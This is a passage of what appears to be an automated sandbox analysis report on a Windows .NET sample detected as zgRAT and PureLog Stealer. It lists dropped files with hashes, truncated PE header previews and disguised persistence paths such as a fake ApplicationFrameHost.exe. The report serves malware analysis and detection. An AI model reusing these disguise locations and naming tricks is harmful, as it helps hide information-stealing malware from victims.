SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ySSJffnK.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\yaIZBZii.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\yjZbtAhM.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zAAjmmUg.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zDtRwDyC.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zGAgyZQh.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zXHyMvKj.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zgBjPAwH.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zjtRYRad.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zrjhuLVB.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zzTAZvvH.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\Setup\State\26853581233ef1

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	216
Entropy (8bit):	5.808917211897706
Encrypted:	false
SSDEEP:	3:UU/e8dDhK+m0cVA1l9q0cBSmF3enQ5f53Wu30DKvfS8M4q/PkYdhh2+mq2R0wtbI:UU5Dk031lgnSmFunQ55Wz4SAve4Un
MD5:	C089D1C0E7463CDF6DCC7918772630D6
SHA1:	8DA44CF00FC8E4B6B1E2B2ED78BE9A1835F966A2
SHA-256:	743C267C70C7E0BEA4B5360FFC6B93F3F44150DBBBEB56AD13C66D151DDBA270
SHA-512:	466CF26FA515B269BA263E334E564B557AA1F6A7F7C56D7338493DB405C897148809FD6CCED25639B5EA80D36C9E27DBD19B23E67412EE2FCE38123BFB6EF5F4
Malicious:	false
Preview:	hAVq0p4EkcvYc5ZfamDRmyDFSL9BPEMRU3j0345Ub1X3FrKU1YQGpFkt6PXpp2zgQdDiWilgrszubKAlApJ0xFmPS04ogQoiB0mmnl8SxtZ6PzRvPvoAs9sK0xQfo79bDRtkhY7Yq0DEqqAdiIYulozCIbv0Vcozu827GrN1yPT26oeJxw7giOzZbrcGmHCOMNTrxCX14h6WU7Fe6lDjfHQf

C:\Windows\Setup\State\axnJvpyQnMRKSw.exe

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3666432
Entropy (8bit):	7.8229155292844075
Encrypted:	false
SSDEEP:	98304:HCLp6aQhP2k4Xrn/kRCH9ldADNbkAiS5uSM:HK6P2k4XD/kRCd/8YTSm
MD5:	6C5F6433BAE4CBF3DC2D1FD40B716B08
SHA1:	0EBA0DD22B3F5053798EBA26E027EF7383602774
SHA-256:	9BCFA4A19BE080565CAF27F4EA1BC691C124601BB120AAC4CA55802593AF400A
SHA-512:	F82E07CCE03B3BC2B661B1CE014CC4C9F4BECBD695415B714C4C1A0FBF0F3BCAFB59A1F550BBEE687E7BE927F54B20624D6FB017106CA16EE8C0EE126113E84D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f+Ve..................7...........8.. ... 8...@.. .......................`8...........@...................................8.K.... 8. ....................@8...................................................... ............... ..H............text.....7.. ....7................. ..`.rsrc... .... 8.......7.............@....reloc.......@8.......7.............@..B..................8.....H.......`...x..............I%-.6.8......................................0..........(.... ........8........E............9.......8....(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8........0.......... ........8........E........v...5...............8....r...ps....z8.... ....~....{....:....& ....8........~....(T...~....(X... ....?.... ....~....{v...9x...& ....8m......... ....8]...~....9.... ....8I...~....(L... .... .... ....s....~....(P......

C:\Windows\Setup\State\axnJvpyQnMRKSw.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Web\6dd19aba3e2428

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	ASCII text, with very long lines (677), with no line terminators
Category:	dropped
Size (bytes):	677
Entropy (8bit):	5.8775841622673815
Encrypted:	false
SSDEEP:	12:k/0M6bekGaGKfXZMIjSnBiWiTWRTnOxRmakiDuo0S+7cRWIU0mNpMHqu3pCXtZK:k/0M6CktXyIjsiWiTWcxgBNotopM93b
MD5:	CE44F3DA360D84C3DF16D3DD30996D7B
SHA1:	61267CAEF75CD5C82B8DE06EF82D549F4E68C738
SHA-256:	90DE8B8F1436EACBB5793BF3DB47635FC66EDB053309F349D3CF6D6FA430E823
SHA-512:	DF3BCEC42DE7EB790C0355B3D4908960A81B47C61370E216A19AF7E61746831FA1B5996F7DFBF2659EE9E08BFECB2CF8056C2B70E0BB61E7ADD1116F047ADC5B
Malicious:	false
Preview:	aTrrjeeUsVDK6S14uxbpIg6JN1sGonkMdcRd1zWT4mdnliIjkI8BqTh4XhdrwXpFu1rdAXC5bHvgCTipsJfgojfK5XGUVohg6Y2u1piNGDjjhA1D8y9n2JbKVhhmRsjxkOjoayxDkSZl96m4gCVhp3ox7sYUH56Ydw8TbNnKA6DktzKZ4nGOXCHqjwrsZd5oVBHN7SdTZKgs0EDHh9ZezrAaoStpf5vhAYOsr7blKxyMfZ0ftjKaEbznAqipjxxeZ9sc0UZjhxUB3y4PbO66uUdiikrAZwCWAUxgqXpYKk3QHxuMvSNU11uEgJ3PnYKuv7BiAYjEjivKbMbvzeOGirfJktAgeZuvZIfJwLLXtJvTFkmTsIZIJDLDc28RYCkJx9uTrS9nS1XZ6MDAGqyV9lmW6bq3N49qjlfFzTmaJvzSpwGQy8LsOOKMXXWPlFaY2r0Vq8KwEYMNvUqKVZFOsRbUbTrc7WyEVbZ86uk0yYn0C6aDrM4L9MqlPf4XQrzrjH2U4sNkzPZTnlSf2ovucmEIvysb0MjGj6Q4DFJ88TWuwW8oMYem6EP6DujF9wtnpSuqUXbxfwvIQTVY0EObr7KeqT1TfD9MjsFemRTy7rHKTGqtYLP5hR5sIPABgIRbxjjhO1wjuZeA09LknH4UyDoRxXVWRSRyZpXuh

C:\Windows\Web\ApplicationFrameHost.exe

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3666432
Entropy (8bit):	7.8229155292844075
Encrypted:	false
SSDEEP:	98304:HCLp6aQhP2k4Xrn/kRCH9ldADNbkAiS5uSM:HK6P2k4XD/kRCd/8YTSm
MD5:	6C5F6433BAE4CBF3DC2D1FD40B716B08
SHA1:	0EBA0DD22B3F5053798EBA26E027EF7383602774
SHA-256:	9BCFA4A19BE080565CAF27F4EA1BC691C124601BB120AAC4CA55802593AF400A
SHA-512:	F82E07CCE03B3BC2B661B1CE014CC4C9F4BECBD695415B714C4C1A0FBF0F3BCAFB59A1F550BBEE687E7BE927F54B20624D6FB017106CA16EE8C0EE126113E84D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Web\ApplicationFrameHost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Web\ApplicationFrameHost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Web\ApplicationFrameHost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Web\ApplicationFrameHost.exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f+Ve..................7...........8.. ... 8...@.. .......................`8...........@...................................8.K.... 8. ....................@8...................................................... ............... ..H............text.....7.. ....7................. ..`.rsrc... .... 8.......7.............@....reloc.......@8.......7.............@..B..................8.....H.......`...x..............I%-.6.8......................................0..........(.... ........8........E............9.......8....(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8........0.......... ........8........E........v...5...............8....r...ps....z8.... ....~....{....:....& ....8........~....(T...~....(X... ....?.... ....~....{v...9x...& ....8m......... ....8]...~....9.... ....8I...~....(L... .... .... ....s....~....(P......

C:\Windows\Web\ApplicationFrameHost.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.817439140797561
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FX4Sz+l796voYKqXKNvj:Vx993DEULYC
MD5:	A3C6C84046779917ED112E818CEED262
SHA1:	086B7FE74050E244B0B871FA30F6FA3DB4C7DD48
SHA-256:	983981AD1A6361596E1B8D6C1816A2BBE72386DC114CCE97AA42E826443F62E0
SHA-512:	E5EE78CE41D860ED427DCB2679A987228C811C42A139867E1C416E3B5F4B76B9704255B032E3AE9196846CE88594CBA5124BF68848C98E9F6097D1254D7BBF78
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 30/10/2024 19:24:11..19:24:11, error: 0x80072746.19:24:16, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.8229155292844075
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	FuWRu2Mg82.exe
File size:	3'666'432 bytes
MD5:	6c5f6433bae4cbf3dc2d1fd40b716b08
SHA1:	0eba0dd22b3f5053798eba26e027ef7383602774
SHA256:	9bcfa4a19be080565caf27f4ea1bc691c124601bb120aac4ca55802593af400a
SHA512:	f82e07cce03b3bc2b661b1ce014cc4c9f4becbd695415b714c4c1a0fbf0f3bcafb59a1f550bbee687e7be927f54b20624d6fb017106ca16ee8c0ee126113e84d
SSDEEP:	98304:HCLp6aQhP2k4Xrn/kRCH9ldADNbkAiS5uSM:HK6P2k4XD/kRCd/8YTSm
TLSH:	3B06E01661964EB2C2A1A7358667063D4690D7723616EF0F3A1F20D3BA077F58B722F3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f+Ve..................7...........8.. ... 8...@.. .......................`8...........@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x78090e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x65562B66 [Thu Nov 16 14:47:02 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3808c0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x382000	0x320	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x384000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
